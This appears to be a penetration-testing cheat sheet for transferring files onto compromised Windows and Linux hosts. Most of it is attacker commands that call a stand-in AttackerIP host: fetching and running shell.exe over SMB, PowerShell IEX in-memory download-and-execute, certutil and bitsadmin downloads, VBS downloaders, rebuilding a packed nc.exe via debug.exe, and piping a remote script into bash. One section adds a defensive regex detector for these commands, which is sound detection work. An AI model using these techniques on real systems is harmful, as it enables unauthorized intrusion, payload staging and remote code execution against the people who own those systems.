
File transfer cheat sheet for Windows and Linux operating systems.
Serving Files For Transfer
The two main methods I use for serving files over HTTP are either via Apache, or the Python SimpleHTTPServer module.
To serve a file over Apache, copy said file into /var/www/html and enable the Apache service.
Apache is installed by default in Kali:
```
root@kali:~/# cp file /var/www/html
root@kali:~/# service apache2 start
# Apache is now ready to start serving files for transfer requests.
```
My favourite option is to start a Python webserver within my current working directory:
```
root@kali:~/# python -m SimpleHTTPServer 80
# This will serve on port 80.
# Alternative ports can be specified.
# On Python 3 the equivalent module is http.server: python3 -m http.server 80
```
Windows File Transfers
TFTP
TFTP client is installed by default on Windows machines up to Windows 2003. In Windows 7, Windows 2008, and above, this tool would have to be specifically added during installation.
```
root@kali:~# mkdir /tftp
root@kali:~# atftpd --daemon --port 69 /tftp   # atftpd is a pre-installed TFTP server in Kali
root@kali:~# cp file /tftp/
```
```
REM Compromised Windows host
C:\> tftp -i AttackerIP get file
```
FTP
It is possible to install a full-featured FTP server like vsftpd in Kali. I find it far easier to use a simple FTP server using Python.
The pyftpdlib library, similar to the HTTP one mentioned earlier, allows you to start an FTP server within your current working directory. Anonymous authentication is also accepted.
```
root@kali:~# apt-get install python-pyftpdlib
root@kali:~# python -m pyftpdlib -p 21
```
With the server up and running, we can transfer files interactively or non-interactively:
```
REM Interactive
C:\> ftp AttackerIP
Connected to AttackerIP
User: anonymous
Password: anonymous
...
ftp> binary
ftp> get shell.exe
```
```
REM Non-Interactive
C:\> echo open AttackerIP > c:\ftp.txt
C:\> echo anonymous >> c:\ftp.txt
C:\> echo anonymous >> c:\ftp.txt
C:\> echo binary >> c:\ftp.txt
C:\> echo get shell.exe >> c:\ftp.txt
C:\> echo bye >> c:\ftp.txt
C:\> ftp -s:C:\ftp.txt
```
SMB
smbserver.py from the Impacket project can be used to launch a nice, simple SMB server on port 445.
All that's needed is for you to specify a share name and the path to the directory containing your file.
```
# The share path is the directory that holds shell.exe
root@kali:/impacket/examples# python smbserver.py transfer_share /root/shells
REM We can then check that our SMB share is up and running from our compromised Windows host.
REM Our designated share name should be visible in the output.
C:\> net view \\AttackerIP
REM Windows commands like dir and copy can also be used
C:\> dir \\AttackerIP\transfer_share
C:\> copy \\AttackerIP\transfer_share\shell.exe
REM Executing shell.exe on the compromised Windows host via our SMB share (transfer_share)
C:\> \\AttackerIP\transfer_share\shell.exe
```
PowerShell
```
# Within PowerShell
PS C:\> Invoke-WebRequest -Uri "http://AttackerIP/file" -OutFile "C:\path\to\file"
REM Outside PowerShell (IEX runs the downloaded content in memory instead of saving it)
C:\> powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://AttackerIP/file')
REM Non-Interactive PowerShell script
C:\> echo $storageDir = $pwd > wget.ps1
C:\> echo $webclient = New-Object System.Net.WebClient >>wget.ps1
C:\> echo $url = "http://AttackerIP/file" >>wget.ps1
C:\> echo $file = "file" >>wget.ps1
C:\> echo $webclient.DownloadFile($url,$file) >>wget.ps1
C:\> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
```
OpenSSL
```
# Generate keys
root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
# Serve the file on Kali
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
REM Execute on Windows box to transfer file to C:\file
C:\> C:\path\to\openssl.exe s_client -quiet -connect AttackerIP:1234 > C:\file
```
certutil
```
C:\> certutil -urlcache -split -f http://AttackerIP/file C:\path\to\out\file
```
bitsadmin
```
C:\> bitsadmin /rawreturn /transfer getpayload http://AttackerIP/file c:\path\to\out\file
```
Visual Basic Script (VBS)
```
REM Option 1:
REM Paste each line separately into the Windows shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
REM The script reads two arguments: the URL (Item(0)) and the output file name (Item(1))
C:\> cscript wget.vbs http://AttackerIP/file file
REM Option 2:
REM Change AttackerIP and the SaveToFile location
C:\> echo Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://AttackerIP/file", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\file":objADOStream.Close > transfer.vbs
C:\> cscript transfer.vbs
```
debug.exe
The debug.exe program acts as an assembler, disassembler, and a hex dumping tool. We're able to take binaries like netcat (nc.exe) and disassemble them into hex.
A series of non-interactive echo commands will write out the binary file into its hex representation.
We can then use debug.exe to assemble the hex file into the original binary file nc.exe on the compromised host. There is a 64k size limit for transferable files.
```
root@kali:~# ls -l nc.exe
-rwxr-xr-x 1 root root 59392 nc.exe
```
This is close to our limit. We can use upx (an executable packer) to compress it further:
```
root@kali:~# upx -9 nc.exe
...
root@kali:~# ls -l nc.exe
-rwxr-xr-x 1 root root 29184 nc.exe
```
The file size is now more suitable for transfer and has been decreased in size by almost 50%.
We can now convert the nc.exe file into a text file usable by debug.exe on our compromised Windows host. The tool we'll be using is exe2bat.exe:
```
root@kali:~# cp /usr/share/windows-binaries/exe2bat.exe .   # Copy exe2bat.exe into our current working directory
root@kali:~# wine exe2bat.exe nc.exe nc.txt
```
This will produce an nc.txt file we can simply copy and paste into the remote Windows shell, and nc.exe will be automatically created on the compromised host.
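From the defender's side, the Windows transfer commands in this section leave recognizable process command lines. The following is an added example, not part of the original cheat sheet: a Python matcher run over constructed process-creation events. The rule names, hostnames and the 192.0.2.10 address are assumptions made for the illustration.

```python
import re

# Command-line patterns for the Windows transfer techniques listed above.
# Rule names are labels chosen for this example.
RULES = [
    ("tftp_get", re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("ftp_script", re.compile(r"\bftp(\.exe)?\s+-s:", re.I)),
    ("certutil_urlcache", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*https?://", re.I)),
    ("bitsadmin_transfer", re.compile(r"\bbitsadmin(\.exe)?\b.*/transfer\b", re.I)),
    ("powershell_download", re.compile(
        r"\bpowershell(\.exe)?\b.*(downloadstring|downloadfile|invoke-webrequest)", re.I)),
    ("powershell_policy_bypass", re.compile(
        r"\bpowershell(\.exe)?\b.*-executionpolicy\s+bypass", re.I)),
    ("cscript_url_arg", re.compile(r"\bcscript(\.exe)?\s+\S+\.vbs\s+https?://", re.I)),
    ("openssl_s_client", re.compile(r"\bopenssl(\.exe)?\s+s_client\b", re.I)),
    ("unc_executable", re.compile(r"^\\\\[^\\\s]+\\[^\\\s]+\\\S+\.exe\b", re.I)),
]

def classify(command_line):
    """Return the names of all rules that match one process command line."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(events):
    """Yield (host, command_line, hits) for events that match at least one rule."""
    for host, command_line in events:
        hits = classify(command_line)
        if hits:
            yield host, command_line, hits

# Constructed sample events (host, command line); 192.0.2.10 is a documentation address.
SAMPLE_EVENTS = [
    ("ws01", r"certutil -urlcache -split -f http://192.0.2.10/file C:\Users\Public\file"),
    ("ws01", r"bitsadmin /rawreturn /transfer getpayload http://192.0.2.10/file c:\temp\file"),
    ("ws02", r"ftp -s:C:\ftp.txt"),
    ("ws02", r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1"),
    ("ws03", r"\\192.0.2.10\transfer_share\shell.exe"),
    ("ws03", r"certutil -hashfile C:\Users\Public\setup.msi SHA256"),  # benign use
    ("ws04", r"ftp files.example.com"),  # interactive session, no script file
]

if __name__ == "__main__":
    for host, cmd, hits in scan(SAMPLE_EVENTS):
        print(f"{host}: {','.join(hits)}: {cmd}")
```

The two benign entries show why the rules key on the transfer-specific switches (`-urlcache`, `-s:`) and not on the binary name alone.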
Linux File Transfers
wget
```
# -O sets the output file (lowercase -o would write wget's log there instead)
wget http://AttackerIP/file -O /var/tmp/file
```
curl
```
curl http://AttackerIP/file --output /var/tmp/file
curl AttackerIP/linenum.sh | bash
```
netcat
```
root@kali:~# nc -nlvp 1234 > file   # Start listener on Kali, writing received data to file
cat file | nc AttackerIP 1234        # Cat the file and pipe to our nc connection
```
fetch (FreeBSD)
```
fetch -o /var/tmp/file "http://AttackerIP/file"
```
Python
vim download.py:
```python
#!/usr/bin/env python3
from urllib.request import urlopen

# Fetch the file and write it in binary mode so non-text content is not corrupted
with urlopen('http://AttackerIP/file') as u, open('local_file', 'wb') as local_file:
    local_file.write(u.read())
```
```
$ chmod +x download.py   # Grant executable permission
$ python3 download.py    # Run on compromised Linux host
```
OpenSSL
Generate keys
```
root@kali:~# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
```
Serve the file on Kali
```
root@kali:~# openssl s_server -quiet -key key.pem -cert cert.pem -port 1234 < file
```
Execute on Linux host to GET the file
```
$ openssl s_client -quiet -connect AttackerIP:1234 > file
```
socat
```
socat TCP4-LISTEN:8000,fork file:<file to transfer>   # server
socat TCP4:<ip>:8000 file:<file to get>,create        # client
```